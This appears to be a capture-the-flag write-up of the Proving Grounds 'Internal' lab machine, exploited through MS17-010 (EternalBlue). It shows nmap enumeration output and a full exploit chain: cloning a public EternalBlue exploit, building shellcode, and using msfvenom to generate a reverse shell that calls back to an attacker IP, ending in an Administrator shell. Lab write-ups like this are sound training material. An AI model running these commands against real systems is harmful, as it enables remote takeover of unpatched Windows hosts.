In this walk through, we will be going through the Internal room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation of MS17-010 (Eternal Blue) vulnerability to get root on the system. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Internal |
IPaddress | 192.168.166.40 |
Difficulty | Easy |
OS | Windows |
Description | Internal is an Easy rated Window machine that is vulnerable to MS17-010 (Eternal Blue) exploit. |
Enumeration:
- I started off with my regular nmap aggressive scan and found multiple ports opened. Some interesting ones were – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 5357 (HTTP).
$ sudo nmap -A 192.168.166.40 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:06 IST Nmap scan report for 192.168.166.40 Host is up (0.20s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp filtered domain 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? |_ssl-date: 2024-02-10T16:38:38+00:00; 0s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/10%OT=135%CT=1%CU=30488%PV=Y%DS=4%DC=T%G=Y%TM=65C7A6 OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TS=7)OPS(O1=M54ENW8ST1 OS:1%O2=M54ENW8ST11%O3=M54ENW8NNT11%O4=M54ENW8ST11%O5=M54ENW8ST11%O6=M54EST OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80 OS:%W=2000%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R OS:=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7 OS:(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAEB%RUD=G) OS:IE(R=N) Network Distance: 4 hops Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2 Host script results: |_clock-skew: mean: 1h59m59s, deviation: 4h00m01s, median: -1s |_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:a1:8b (VMware) | smb-os-discovery: | OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: internal | NetBIOS computer name: INTERNAL\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-02-10T08:38:31-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2024-02-10T16:38:30 |_ start_date: 2023-02-18T02:15:24 TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 199.51 ms 192.168.45.1 2 199.54 ms 192.168.45.254 3 199.55 ms 192.168.251.1 4 200.44 ms 192.168.166.40 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 168.75 seconds
- I started my enumeration with SMB but got nothing back.
smbclient -L 192.168.166.40 smbmap -H 192.168.166.40
- Next, i used the nmap vulners script on the SMB port 445 to test for MS17-010 (Eternal Blue) and got positive hit on that.
$ sudo nmap -p445 --script smb-vuln-ms17-010 192.168.166.40 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:24 IST Nmap scan report for 192.168.166.40 Host is up (0.21s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Nmap done: 1 IP address (1 host up) scanned in 3.07 seconds
Exploitation & Getting root:
- Checked for the EternalBlue exploits other than the Metasploit one. Found one in Exploit DB but it doesn’t seems to work. So, i used a different one from github.
- Setup the exploit requirement using the below commands. The following commands will create a python2 virtual environment using pyenv, then will install the required impacket version on it. After that, we will download the exploit we are using here from github. Create the shell code using nasm and msfvenom. Then we will merge both the shell code in one file as required by the exploit. At last, fire the exploit on the target specifying its IP address.
# Activate a virtual environment pyenv virtualenv 2.7.18 eternalblue pyenv activate eternalblue pip install impacket==0.9.22 # Clone the exploit git clone https://github.com/worawit/MS17-010.git # Create shell code nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.45.207 --platform windows -a x86 --format raw -o sc_x86_payload.bin cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin # Fire the exploit python2 eternalblue.py 192.168.166.40 sc_x86.bin
- We got a shell back as Administrator on our netcat listener. Captured the root flag and marked the machine as complete.
Also Read: PG – Image
Conclusion:
So that was “Internal” for you. We started off with a regular nmap scan and found multiple ports opened – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 5357 (HTTP). Next also performed a vulners scan and found out that it is vulnerable to MS17-010 (Eternal Blue). Looked online for related exploit on Exploit-DB and fired it on the target to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.